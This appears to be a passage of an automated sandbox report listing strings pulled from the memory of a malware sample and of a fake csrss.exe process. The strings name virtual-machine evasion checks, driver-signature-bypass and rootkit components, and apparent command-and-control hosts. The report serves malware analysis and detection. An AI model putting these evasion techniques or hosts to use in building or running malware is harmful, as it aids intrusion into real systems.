            Source: 1dyvctHqv1.exe, 0000000C.00000002.332663747.00000000160D4000.00000004.00000001.sdmpBinary or memory string: ?advapi32.dllbackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeVBoxService\\.\VBoxGuest\\.\VBoxTrayIPC[System Process]vgauthservice.exeSystemvgauthservice.exeRegistryvgauthservice.exesmss.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exefontdrvhost.exevgauthservice.exefontdrvhost.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exedwm.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeMemory Compressionmemory compressionvgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeShellExperienceHost.exeshellexperiencehost.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exesmartscreen.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeSystemSettingsBroker.exesystemsettingsbroker.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeSgrmBroker.exevgauthservice.exeTrustedInstaller.exetrustedinstaller.exevgauthservice.exevgauthservice.exe1dyvctHqv1.exevgauthservice.exevmmemctlvmusbmousevmx_svga[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUq
            Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: unknown network workbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCertFindExtensionCreateStdDispatchCryptDecodeObjectDnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfractional secondgp.waiting != nilhandshake failureif-modified-sinceillegal parameterimpersonation: %win string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedpseudo-device: %sread revision: %wrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seek at 0x%0x: %wseeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunknown caller pcwait for GC cyclewine_get_version
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaClass(CommonCookieCopticDELETEExpectFltMgrFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon[]byte\??\%s\csrss\ufffd
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmpBinary or memory string: vmhgfs$
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmpBinary or memory string: vboxtray.exevboxservice.exesmss.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exewininit.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exewinlogon.exevboxtray.exevboxservice.exeservices.exevboxtray.exevboxservice.exelsass.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedwm.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesihost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exectfmon.exevboxtray.exevboxservice.exeexplorer.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeSearchUI.exesearchui.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeHxTsr.exehxtsr.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.execonhost.exevboxtray.exevboxservice.exeUsoClient.exeusoclient.exevboxtray.exevboxservice.exeUsoClient.exeusoclient.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesgrmbroker.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exe1dyvcthqv1.exevboxtray.exevboxservice.exeOpenSCManagerWOpenServiceWVBoxSF$
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmpBinary or memory string: [system process]vboxtray.exe
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmpBinary or memory string: vmsrvc.exevmusrvc.exesmss.exevmsrvc.exevmusrvc.execsrss.exevmsrvc.exevmusrvc.exewininit.exevmsrvc.exevmusrvc.execsrss.exevmsrvc.exevmusrvc.exewinlogon.exevmsrvc.exevmusrvc.exeservices.exevmsrvc.exevmusrvc.exelsass.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedwm.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exespoolsv.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesihost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exectfmon.exevmsrvc.exevmusrvc.exeexplorer.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.execonhost.exevmsrvc.exevmusrvc.exeUsoClient.exeusoclient.exevmsrvc.exevmusrvc.exeUsoClient.exeusoclient.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevpc-s3vpcuhub$
            Source: csrss.exeBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad message
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmpBinary or memory string: systemvmsrvc.exe
            Source: csrss.exeBinary or memory string: ikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexa
            Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf+inf, n -Inf-inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0.100x%x108020063125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup
            Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: to unallocated span%%!%c(*big.Float=%s)%s\Sysnative\cmd.exe37252902984619140625Arabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWDHT has wrong lengthDQT has wrong lengthDRI has wrong lengthEgyptian_HieroglyphsEnumProcessModulesExFileTimeToSystemTimeGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetModuleFileNameExWGetModuleInformationGetProcessMemoryInfoGetWindowsDirectoryWIDS_Trinary_OperatorInsufficient StorageIsrael Standard TimeJordan Standard TimeMAX_HEADER_LIST_SIZEMalformed JSON errorMediapartners-GoogleMeroitic_HieroglyphsNtUnmapViewOfSectionNtWriteVirtualMemoryOffline Explorer/2.5ProcessIdToSessionIdQueryServiceConfig2WQueryServiceStatusExRegisterEventSourceWRequest URI Too LongRtlInitUnicodeStringSHGetKnownFolderPathSOF has wrong lengthSOS has wrong lengthSafeArrayDestroyDataSafeArrayGetElemsizeSeek: invalid offsetSeek: invalid whenceSetCurrentDirectoryWSetHandleInformationSetVolumeMountPointWTaipei Standard TimeTerminal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection error: %sconnection timed outcouldn't disable DSEcouldn't get IsAdmincouldn't get serverscouldn't run servicecouldn't set IsAdmincouldn't set serverscouldn't stop PsaSvccouldn't write patchelectrum.hsmiths.comelectrum.taborsky.czelectrum.villocq.comflag: help requestedfloating point errorforcegc: phase errorgc_trigger underflowgetadaptersaddressesgo of nil func valuegopark: bad g statusgzip: invalid headerheader line too longhttp2: stream closedinvalid repeat countinvalid request codeis a named type filejson: Unmarshal(nil json: Unmarshal(nil)key has been revokedmSpanList.insertBackmalformed ciphertextmalloc during signalmultiple SOF markersno such struct fieldnon-empty swept listnorm: invalid whencenot an integer classnotetsleep not on g0number has no digitsnumber of componentsp mcache not flushedpacer: assist ratio=pad length too largepreempt off reason: reflect.Value.SetIntreflect.makeFuncStubrequest file CDN: %wroot\SecurityCenter2runtime: casgstatus runtime: double waitruntime: unknown pc semaRoot rotateRightshort segment lengthsystemdrive is emptytime: invalid numbertrace: out of memoryunexpected network: unknown address typeuser is not an adminverifier host cachedwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundzlib: invalid header gp.gcscanvalid=true
            Source: csrss.exeBinary or memory string: time: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released MB) wo
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmpBinary or memory string: GPUB3SR64GYCloseHandleS-1-5-18nehalemkvmqemuvirtualpersoconProcess32FirstW[system process]vboxtray.exevboxservice.exeProcess32NextWSystemsystemvboxtray.exevboxservice.exeRegistryregistry
            Source: 1dyvctHqv1.exe, 00000000.00000002.298174176.0000000004BC5000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.326226271.0000000004D87000.00000040.00000001.sdmp, csrss.exe, 00000011.00000002.554922240.0000000005200000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000002.408273398.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000021.00000002.406886356.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.406346781.0000000005200000.00000040.00000001.sdmpBinary or memory string: ameNewaPINGPOSTQEMUROOTHIT!u
            Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: 100-continue152587890625762939453125Bidi_ControlCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
            Source: 1dyvctHqv1.exe, 00000000.00000002.298174176.0000000004BC5000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.326226271.0000000004D87000.00000040.00000001.sdmp, csrss.exe, 00000011.00000002.554922240.0000000005200000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000002.408273398.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000021.00000002.406886356.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.406346781.0000000005200000.00000040.00000001.sdmpBinary or memory string: \\.\HGFS`
            Source: svchost.exe, 00000003.00000002.550030923.0000012673428000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.550396287.000001B888267000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.550346133.0000025DB8829000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.326077138.0000000003298000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: csrss.exeBinary or memory string: EndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*
            Source: csrss.exeBinary or memory string: llocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't
            Source: csrss.exeBinary or memory string: ypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ... H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.we
            Source: csrss.exeBinary or memory string: releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332844890.0000000016100000.00000004.00000001.sdmpBinary or memory string: runtimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe1dyvctHqv1.exexenevtchn
            Source: csrss.exeBinary or memory string: mAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup %+v m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6cha
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
            Source: csrss.exe, 00000027.00000002.406346781.0000000005200000.00000040.00000001.sdmpBinary or memory string: tvmhgfsQ
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332796941.00000000160F6000.00000004.00000001.sdmpBinary or memory string: sharedintapp.exevmsrvc.exe
            Source: svchost.exe, 00000003.00000002.550260603.0000012673464000.00000004.00000001.sdmpBinary or memory string: HGFs&
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6chancoldcooldampdarkdatadatedawndeaddialdustermsetagfailfilefirefrogfromftpsfuncgziphazehillholyhosthourhttpicmpidleigmpint8jpegjsonkindlakelateleaflinklongmoonnonenullopenpathpinepipepondpop3quitrainreadsbrkseeksid=smtpsnowsse2sse3starsurftag:tcp4tcp6texttreetruetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ...
            Source: svchost.exe, 00000003.00000002.549929478.0000012673402000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
            Source: csrss.exe, 00000027.00000002.406346781.0000000005200000.00000040.00000001.sdmpBinary or memory string: yvmciwavewildwB
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmpBinary or memory string: [system process]vmsrvc.exe
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332796941.00000000160F6000.00000004.00000001.sdmpBinary or memory string: sharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.execonhost.exesharedintapp.exeUsoClient.exeusoclient.exesharedintapp.exeUsoClient.exeusoclient.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exedllhost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesgrmbroker.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exe1dyvcthqv1.exesharedintapp.exevmsrvc.exevmusrvc.exeSearchUI.exesearchui.